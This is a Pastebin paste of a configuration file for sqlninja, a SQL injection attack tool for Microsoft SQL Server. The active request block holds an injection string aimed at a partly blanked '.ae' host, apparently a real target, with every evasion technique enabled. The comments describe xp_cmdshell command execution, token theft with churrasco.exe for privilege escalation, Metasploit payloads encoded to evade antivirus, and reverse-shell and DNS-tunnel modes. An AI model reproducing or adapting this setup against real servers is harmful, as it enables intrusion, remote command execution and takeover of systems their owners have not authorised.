Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###################################
- # SQLNINJA CONFIGURATION FILE #
- ###################################
- # options are case sensitive
- # see sqlninja-howto.html for more information and examples
- ############ HTTP REQUEST ############
- # The entire HTTP request, including the exploit string and a marker for the
- # SQL command to execute (__SQL2INJECT__)
- # Be sure to include the vulnerable parameter and the character sequence that
- # allows us to start injecting commands. In general this means, at least:
- # - an apostrophe (if the parameter is a string)
- # - a semicolon (to end the original query)
- # It must also include everything necessary to properly close the original
- # query, like an appropriate number of closing brackets. Don't forget to
- # URL-encode, where needed (e.g. a space must become '%20' or '+')
- #
- # For instance, if you need to inject something like the following:
- # aaa=1&bbb=x';exec+master..xp_cmdshell+'dir+c:'--
- # then parameter should look like this:
- # aaa=1&bbb=x';__SQL2INJECT__
- #
- # Make sure that:
- # 1. The --httprequest_start-- and-- httprequest_end-- markers are in place
- # 2. All required headers are present
- # 3. There are no spaces at the beginning of a line
- # 4. There are not comment lines
- # Consider copying the exact request that triggers the injection from a proxy
- # intercept (e.g.: BurpSuite), if unsure
- #
- # GET EXAMPLE:
- --httprequest_start--
- GET http://?';__SQL2INJECT__ HTTP/1.0
- Host: www.?.ae
- User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
- Accept-Language: en-us,en;q=0.7,it;q=0.3
- Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
- Content-Type: application/x-www-form-urlencoded
- Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
- Authorization: Basic yyyyyyyyyyyyyyyyyyyyy
- Connection: close
- --httprequest_end--
- #
- # POST EXAMPLE: (The Content-Length Header is automatically added by sqlninja!)
- # --httprequest_start--
- # POST https://www.victim.com/page.asp HTTP/1.0
- # Host: www.victim.com
- # User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
- # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
- # Accept-Language: en-us,en;q=0.7,it;q=0.3
- # Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
- # Content-Type: application/x-www-form-urlencoded
- # Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
- # Authorization: Basic yyyyyyyyyyyyyyyyyyyyy
- # Connection: close
- #
- # vulnerableparam=aaa';__SQL2INJECT__&otherparam=blah
- # --httprequest_end--
- #
- # HEADER-BASED EXAMPLE:
- # --httprequest_start--
- # GET http://www.victim.com/page.asp HTTP/1.0
- # Host: www.victim.com
- # User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
- # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
- # Accept-Language: en-us,en;q=0.7,it;q=0.3
- # Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
- # Content-Type: application/x-www-form-urlencoded
- # Cookie: VulnCookie=xxx'%3B__SQL2INJECT__
- # Connection: close
- # --httprequest_end--
- #
- # Note that in the last example the semicolon was encoded, otherwise the server would not
- # parse __SQL2INJECT__ as part of VulnCookie
- # Local host: your IP address (for backscan and revshell modes)
- lhost = ?
- # Interface to sniff when in backscan mode
- device = eth1
- # Evasion techniques to be used. Possible choices are:
- # 1 - Query hex-encoding
- # 2 - Comments as separators
- # 3 - Random case
- # 4 - Random URI encoding
- # All techniques can be combined, so the following is legal:
- evasion = 1234
- # However, keep in mind that using too many techniques at once leads to very
- # long queries, that might create problems when using GET. Default: no evasion
- # evasion = 12
- # Path to metasploit executable. Only needed if msfpayload and
- # msfcli are not already in the path
- msfpath = /pentest/exploits/framework2
- # Encoder to use with msfencode. If the option is not present, no encoding
- # is used. However, it's definitely recommended to use it, if you suspect that
- # an AV is present. A list of available encoders can be retrieved by simply
- # running "msfencoder -l"
- # msfencoder = x86/shikata_ga_nai
- # Number of times to encode the metasploit payload. Default: 5
- # msfencodecount = 4
- # If you can execute commands but SQL Server does not run as SYSTEM,
- # you can use churrasco.exe to steal the appropriate token and escalate
- # privileges. Enable this option to use churrasco.exe before executing
- # a command. This is especially useful with the metasploit module and VNC
- # Obviously, you first need to upload churrasco.exe using
- # the upload module!
- usechurrasco = no
- # Proxy host to use (default: none)
- # proxyhost = 127.0.0.1
- # Proxy port to use (default: 8080)
- # proxyport = 8080
- # Domain to use for dnstunnel mode
- domain = sqlninja.net
- # tcpdump filter (optional)
- # filter = src host x.x.x.x
- # Backscan timeout after web request conclusion (Default: 5 secs)
- timeout = 5
- # Maximum hostname length for DNS tunnel (Max: 250 - Default: 250)
- # hostnamelength = 250
- # IP address to return to DNS queries (default: 10.255.255.254)
- # resolvedip = 10.255.255.254
- # Name of the procedure to use/create to launch commands. Default is
- # "xp_cmdshell". If set to "NULL", openrowset+sp_oacreate will be used
- # for each command
- # xp_name = xp_cmdshell
- # Time value for the WAITFOR during inference attack of fingerprint and
- # bruteforce mode. A higher value makes things slower but will yeld more
- # precise results against slow targets.
- # Min: 3 seconds. Max: 59 seconds. Default: 5 seconds
- blindtime = 10
- # Number of script lines to upload with a single HTTP request. A higher number
- # obviously means a faster upload. However, do not push this too high if your
- # request contains very long parameters. Maximum is 30, and 10 is a default
- # safe value providing already a good speed
- # lines_per_request = 10
- # If the remote server returns a custom error page instead of a standard
- # HTTP error code (e.g. 500 Server Error), it is wise to set this value to
- # some string that is present in such a page. This will help sqlninja in
- # figuring out if things seem to be wrong
- # errorstring = "an error has occurred"
- # By default, sqlninja appends two hyphens to the injected query in order
- # to comment out any spurious SQL code. This is good and works in
- # approximately 99% of the cases. However, you might want to change this
- # behavior in some very specific scenarios. Change this setting only if you
- # really know what you are doing,
- # Possible values: yes/no
- # appendcomment = yes
- # When using the Metasploit module DEP is not a problem anymore, since in
- # all recent versions of the framework the stager will take care of it by
- # itself. However, if needed you can still roll back to the old sqlninja
- # behavior and disable DEP by whitelisting the stager with a call to
- # xp_regwrite. To do so, set 'checkdep' to 'yes'
- # checkdep = no
- # You can override the standard marker used to detect where to inject the
- # sql attack code. You will probably never need to change this
- # sqlmarker = __SQL2INJECT__
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement